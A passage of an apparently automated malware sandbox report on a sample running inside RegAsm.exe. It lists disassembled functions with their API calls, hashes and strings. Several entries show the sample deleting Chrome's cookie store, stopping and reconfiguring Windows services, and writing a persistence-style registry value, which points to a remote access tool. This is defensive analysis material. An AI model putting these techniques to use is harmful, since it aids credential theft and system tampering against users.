                                                                                              • int.LIBCPMT ref: 0040BD5E
                                                                                                • Part of subcall function 00409864: std::_Lockit::_Lockit.LIBCPMT ref: 00409875
                                                                                                • Part of subcall function 00409864: std::_Lockit::~_Lockit.LIBCPMT ref: 0040988F
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 0040BD67
                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040BD9E
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDA7
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040BDC5
                                                                                              • __Init_thread_footer.LIBCMT ref: 0040BE06
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 2409581025-0
                                                                                              • Opcode ID: c5f783e14f87cefe116d90d775a74b105a54ea3f7e80080ef4d35d6868249059
                                                                                              • Instruction ID: f9d61c3bcc2ce2a12a6fed84a452ab5d8f8c1208be56ff46f61e8ed68a895f59
                                                                                              • Opcode Fuzzy Hash: c5f783e14f87cefe116d90d775a74b105a54ea3f7e80080ef4d35d6868249059
                                                                                              • Instruction Fuzzy Hash: 6221A432A00624DBCB14EBA9E9429DE7768DF45324B60017BF501A73D2EFB99D018BDD
                                                                                              Function 0044310B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00442E52: _free.LIBCMT ref: 00442E7B
                                                                                              • _free.LIBCMT ref: 00443159
                                                                                                • Part of subcall function 0043BEB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
                                                                                                • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
                                                                                              • _free.LIBCMT ref: 00443164
                                                                                              • _free.LIBCMT ref: 0044316F
                                                                                              • _free.LIBCMT ref: 004431C3
                                                                                              • _free.LIBCMT ref: 004431CE
                                                                                              • _free.LIBCMT ref: 004431D9
                                                                                              • _free.LIBCMT ref: 004431E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 14f12bd113228a0bc42e7f884a469555986834d255118da641fb1e654957abe0
                                                                                              • Instruction ID: a09468fba7be4ed354c4ff5dcfaf30c25cb33cc25251885fb4c19c4112b9c667
                                                                                              • Opcode Fuzzy Hash: 14f12bd113228a0bc42e7f884a469555986834d255118da641fb1e654957abe0
                                                                                              • Instruction Fuzzy Hash: D3116031951704A6E520FBB2CD07FCB77DCAF04B04F804C2EB39A66053DBB9A5464754
                                                                                              Function 00431C88 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00431C7F,0042EEF4), ref: 00431C96
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00431CA4
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00431CBD
                                                                                              • SetLastError.KERNEL32(00000000,?,00431C7F,0042EEF4), ref: 00431D0F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 81d3ad3cf813b00a2e0cf9f8b814f9992bd51637a01967386a431731664930c9
                                                                                              • Instruction ID: 1b5bb3bab03150c8a1469d7da8b67c39e9eff8abb396b2b9584377dc358b62c2
                                                                                              • Opcode Fuzzy Hash: 81d3ad3cf813b00a2e0cf9f8b814f9992bd51637a01967386a431731664930c9
                                                                                              • Instruction Fuzzy Hash: E801283230D2215EEB2557B6BC89A672B95EB4B779B20223FF610412F0FF595C02914D
                                                                                              Function 00407F4F Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies,00000000), ref: 00407F8B
                                                                                              • GetLastError.KERNEL32 ref: 00407F95
                                                                                              Strings
                                                                                              • UserProfile, xrefs: 00407F5B
                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 00407F56
                                                                                              • [Chrome Cookies found, cleared!], xrefs: 00407FBB
                                                                                              • [Chrome Cookies not found], xrefs: 00407FAF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteErrorFileLast
                                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                              • API String ID: 2018770650-304995407
                                                                                              • Opcode ID: b78552d0cf51e5af76c49f789ec0e556899faebe5107a7965b2598eb8b80988b
                                                                                              • Instruction ID: 9b808550f0e4f9b834a21a45c6ecabfd6167029ebe00eae2a55e211491ffde40
                                                                                              • Opcode Fuzzy Hash: b78552d0cf51e5af76c49f789ec0e556899faebe5107a7965b2598eb8b80988b
                                                                                              • Instruction Fuzzy Hash: 0A01F231A90106AACA047B75CE1B8AE7B24A912704B50017FE902731D2FD795909C29F
                                                                                              Function 0043AD9B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __cftoe
                                                                                              • String ID:
                                                                                              • API String ID: 4189289331-0
                                                                                              • Opcode ID: 0e532726b122eb18f907c7bceffc294a5a8d2e25735973ef8a975cd35c6bafd6
                                                                                              • Instruction ID: 03017b7e80f62d50ee97b9a70ef162e4b45f9fae610041ecd781f4744da9c5cc
                                                                                              • Opcode Fuzzy Hash: 0e532726b122eb18f907c7bceffc294a5a8d2e25735973ef8a975cd35c6bafd6
                                                                                              • Instruction Fuzzy Hash: 96514E72980205ABDB249B69CC42FAF77A9DF4C324F24121FF85596291DB3CDD20876E
                                                                                              Function 00413398 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00412AF7,00000000), ref: 004133A8
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00412AF7,00000000), ref: 004133BC
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00412AF7,00000000), ref: 004133C9
                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00412AF7,00000000), ref: 004133FE
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00412AF7,00000000), ref: 00413410
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00412AF7,00000000), ref: 00413413
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                              • String ID:
                                                                                              • API String ID: 493672254-0
                                                                                              • Opcode ID: 3071766905a9aa70e8b84d46910c906af901398d300ed7046dcbbe556962e6e3
                                                                                              • Instruction ID: 5fec4a889dd1482bee852cd790d8d51d36b2b239aed0c5db9861f1eb3ade3fe9
                                                                                              • Opcode Fuzzy Hash: 3071766905a9aa70e8b84d46910c906af901398d300ed7046dcbbe556962e6e3
                                                                                              • Instruction Fuzzy Hash: FB0126315441197BD6115F295C4AEBB3A5CDB42372F00022AF925931C0CE699F4691AE
                                                                                              Function 0043F13C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID: h^C
                                                                                              • API String ID: 1036877536-1919427450
                                                                                              • Opcode ID: 065bfbd48569dd85fd5e6b052d5978790a7c5ec4dc6bcfed56da8f5f56f7e80a
                                                                                              • Instruction ID: fee652c8f8de97b311e1edd3a94b9fd3768e3e6ba78c6f1d0a7032b1fb29f99c
                                                                                              • Opcode Fuzzy Hash: 065bfbd48569dd85fd5e6b052d5978790a7c5ec4dc6bcfed56da8f5f56f7e80a
                                                                                              • Instruction Fuzzy Hash: 7FA14836D003869FEB11CE58C8817AFBBA5EF69314F2441BFD9959B341C23C8949C759
                                                                                              Function 0040C032 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040C03F
                                                                                              • int.LIBCPMT ref: 0040C052
                                                                                                • Part of subcall function 00409864: std::_Lockit::_Lockit.LIBCPMT ref: 00409875
                                                                                                • Part of subcall function 00409864: std::_Lockit::~_Lockit.LIBCPMT ref: 0040988F
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 0040C05B
                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040C092
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C09B
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C0B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 2243866535-0
                                                                                              • Opcode ID: 95aeb927a9e446bc9fb2c3204e77c5afd8f4c765209aaec4a41c12be9388a058
                                                                                              • Instruction ID: 0b31b2499ed0c1530e6b3d0bed5a99b6867b6c6aa33ff75d33899171708bb31b
                                                                                              • Opcode Fuzzy Hash: 95aeb927a9e446bc9fb2c3204e77c5afd8f4c765209aaec4a41c12be9388a058
                                                                                              • Instruction Fuzzy Hash: 2A01C432900228D7CB14EFA5D88189E776C9F41714F60426FF515772D1EAB89E05C799
                                                                                              Function 0043C614 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                              • _free.LIBCMT ref: 0043C64B
                                                                                              • _free.LIBCMT ref: 0043C673
                                                                                              • SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680
                                                                                              • SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                              • _abort.LIBCMT ref: 0043C692
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: e8f541c665fafb93c1da0bbdfeffbbcf2c95524a8b07c2109ffe4dc02d8d7a59
                                                                                              • Instruction ID: f51d0cfb58148002e83728663e471f6201f99694adbf6054cd0f5061c7e077da
                                                                                              • Opcode Fuzzy Hash: e8f541c665fafb93c1da0bbdfeffbbcf2c95524a8b07c2109ffe4dc02d8d7a59
                                                                                              • Instruction Fuzzy Hash: 1CF0497590060026C2112735BC5BF5B27559BDB769F20302FF924A2290EE2CC802425D
                                                                                              Function 004132CA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00412D00,00000000), ref: 004132D9
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00412D00,00000000), ref: 004132ED
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D00,00000000), ref: 004132FA
                                                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00412D00,00000000), ref: 00413309
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D00,00000000), ref: 0041331B
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D00,00000000), ref: 0041331E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID:
                                                                                              • API String ID: 221034970-0
                                                                                              • Opcode ID: 4418c0144d096111ae53b4e3f1717c1deceb3ca9990d3752d48c4df148a3b705
                                                                                              • Instruction ID: b2c5ceb5835a0e52a8200594826144103f446a1ddf7c0e9e6865c673d70b3852
                                                                                              • Opcode Fuzzy Hash: 4418c0144d096111ae53b4e3f1717c1deceb3ca9990d3752d48c4df148a3b705
                                                                                              • Instruction Fuzzy Hash: D8F0F6759011187BD320AF659C4ADBF3B6CDB86356F40002AFE0997141DF388E4696F9
                                                                                              Function 00413331 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00412C85,00000000), ref: 00413340
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00412C85,00000000), ref: 00413354
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412C85,00000000), ref: 00413361
                                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00412C85,00000000), ref: 00413370
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412C85,00000000), ref: 00413382
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412C85,00000000), ref: 00413385
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID:
                                                                                              • API String ID: 221034970-0
                                                                                              • Opcode ID: f13c7401ebe7a898861ac91539950dc645e57731a144732d60cdc4e431a17a9e
                                                                                              • Instruction ID: 26a4b3f833e9e877c3d8a59b275bd20eef789fc4ef1e4340bdc2f8a59b459027
                                                                                              • Opcode Fuzzy Hash: f13c7401ebe7a898861ac91539950dc645e57731a144732d60cdc4e431a17a9e
                                                                                              • Instruction Fuzzy Hash: 77F0F6759411187FD3216F659C49DBF3B6CDB86396F00006AFE0997140DF388E4695F9
                                                                                              Function 0040D2A7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0040D2B6
                                                                                              • RegSetValueExW.ADVAPI32(?,pth_unenc,00000000,00000001,00000000,00000000,00467F30,?,?,0040A737,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040D2E6
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040A737,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040D2F1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              • String ID: 5.1.3 Light$pth_unenc
                                                                                              • API String ID: 1818849710-640356412
                                                                                              • Opcode ID: a430c6edf17f74098992ac9154db1f546465859e2b6c872928652b55fa7155e1
                                                                                              • Instruction ID: 2e74f0484c559c564727cfda02f69fa124803a4f800e4363bc650dd93a751580
                                                                                              • Opcode Fuzzy Hash: a430c6edf17f74098992ac9154db1f546465859e2b6c872928652b55fa7155e1
                                                                                              • Instruction Fuzzy Hash: 78F0F671940218BBDB009FA1ED46FEA372CEF40745F10417AFD01A7191EA355E08D654
                                                                                              Function 00409743 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040974E
                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040978D
                                                                                                • Part of subcall function 0042CF7D: _Yarn.LIBCPMT ref: 0042CF9C
                                                                                                • Part of subcall function 0042CF7D: _Yarn.LIBCPMT ref: 0042CFC0
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 004097A5
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004097B3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                                                                              • String ID: bad locale name
                                                                                              • API String ID: 3706160523-1405518554
                                                                                              • Opcode ID: 13fed22de21f81b2a35b0cb37550356cb7eb9b2a9533165e17dac1c679de04f0
                                                                                              • Instruction ID: 9d137025840e00eb06f5ff8b3a23299090e48e33d1ea126e93cf13c7e88e76db
                                                                                              • Opcode Fuzzy Hash: 13fed22de21f81b2a35b0cb37550356cb7eb9b2a9533165e17dac1c679de04f0
                                                                                              • Instruction Fuzzy Hash: 92F081326403146BC324FB62F952ADA73649F20314F50493FB406220D2AF78BA1DCA8A
                                                                                              Function 00438A08 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004389B9,00000003,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002), ref: 00438A28
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00438A3B
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,004389B9,00000003,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002,00000000), ref: 00438A5E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: ddf01c5aeed1f8872b046582afe7d0198474f425bac7e19766fad1f5c80fe2ec
                                                                                              • Instruction ID: d0d7485eb252394449f42fd03d40615a4a99cb877cdef310b87857d9b9159d1f
                                                                                              • Opcode Fuzzy Hash: ddf01c5aeed1f8872b046582afe7d0198474f425bac7e19766fad1f5c80fe2ec
                                                                                              • Instruction Fuzzy Hash: 03F06834A01218BBDB11AF91DC49B9EBFB4EF04715F10406AFD05A2260DF745E45CB98
                                                                                              Function 00401EFF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00401C9F,00000001), ref: 00401F3D
                                                                                              • SetEvent.KERNEL32(?,?,00401C9F,00000001), ref: 00401F49
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00401C9F,00000001), ref: 00401F54
                                                                                              • CloseHandle.KERNEL32(?,?,00401C9F,00000001), ref: 00401F5D
                                                                                                • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                              • String ID: KeepAlive | Disabled
                                                                                              • API String ID: 2993684571-305739064
                                                                                              • Opcode ID: 045a6afb365f606cbc8dce02850683b5d936cf7944a6fe58d14f753acde18553
                                                                                              • Instruction ID: 4dd5d21ea278282282332d3fbbd4e75003fae811a8332383d903c8233eb77b47
                                                                                              • Opcode Fuzzy Hash: 045a6afb365f606cbc8dce02850683b5d936cf7944a6fe58d14f753acde18553
                                                                                              • Instruction Fuzzy Hash: 27F0F6719047017FDB103BB59E0E96A7F98BB07715F00057FF881912E2D6B9C81097AA
                                                                                              Function 004134D5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00413507
                                                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 00413515
                                                                                              • Sleep.KERNEL32(00002710), ref: 0041351C
                                                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00413525
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                              • String ID: Alarm triggered
                                                                                              • API String ID: 614609389-2816303416
                                                                                              • Opcode ID: 757ae6de28e99cb357f36de19983d8d7fd268ea62243b07d9320dadb8fdb26df
                                                                                              • Instruction ID: dd9dd7169c3b2ad8cb57031a818ea50ccae587d830f3c19570e6bdd98110ca0d
                                                                                              • Opcode Fuzzy Hash: 757ae6de28e99cb357f36de19983d8d7fd268ea62243b07d9320dadb8fdb26df
                                                                                              • Instruction Fuzzy Hash: C0E01236F44110779520376AAD0FC6F2E28DAC7B55742006FFA05571929D94081586FB
                                                                                              Function 0043501A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f4f1cbb3b3d38803891f4c9e71f607a8433f73a9957174e6732172a256ea8b78
                                                                                              • Instruction ID: fc7f4a77169b4a8b503a3be5dc3e722b80489ba004f86df33c611c31e43807f2
                                                                                              • Opcode Fuzzy Hash: f4f1cbb3b3d38803891f4c9e71f607a8433f73a9957174e6732172a256ea8b78
                                                                                              • Instruction Fuzzy Hash: C971C331900A169BDF21CF98C8846BFBB75FF4A350F2452ABE81167291D7748D41CFA9
                                                                                              Function 0043A3C9 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0043B5D9: RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                                                                              • _free.LIBCMT ref: 0043A4D4
                                                                                              • _free.LIBCMT ref: 0043A4EB
                                                                                              • _free.LIBCMT ref: 0043A50A
                                                                                              • _free.LIBCMT ref: 0043A525
                                                                                              • _free.LIBCMT ref: 0043A53C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3033488037-0
                                                                                              • Opcode ID: 5c731c6bb37465ebd713284b87c403786e096b9ddf25d6edc5433a75e6450f0a
                                                                                              • Instruction ID: 0626f0b1727110b16f7d8c70f251855ad8de191a426444a56e789b4bc756c451
                                                                                              • Opcode Fuzzy Hash: 5c731c6bb37465ebd713284b87c403786e096b9ddf25d6edc5433a75e6450f0a
                                                                                              • Instruction Fuzzy Hash: E751C031A40304AFDB20DF2ACC41B6A77F4EF58724F14556EE989D7260E739E9118B8A
                                                                                              Function 004394E6 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: a7f7c3244b323182d98a37bfe86edf306979d698ca324a6fa4207deaa86ae4c7
                                                                                              • Instruction ID: c8c874e976f7f9d1c30b15fed1f39afc58c2ac3c026be4347813588923dff435
                                                                                              • Opcode Fuzzy Hash: a7f7c3244b323182d98a37bfe86edf306979d698ca324a6fa4207deaa86ae4c7
                                                                                              • Instruction Fuzzy Hash: 06410633A00210AFCB24DF78C981A5EB3E5EF88314F15416AE915EB351EB75ED01CB84
                                                                                              Function 0044333D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
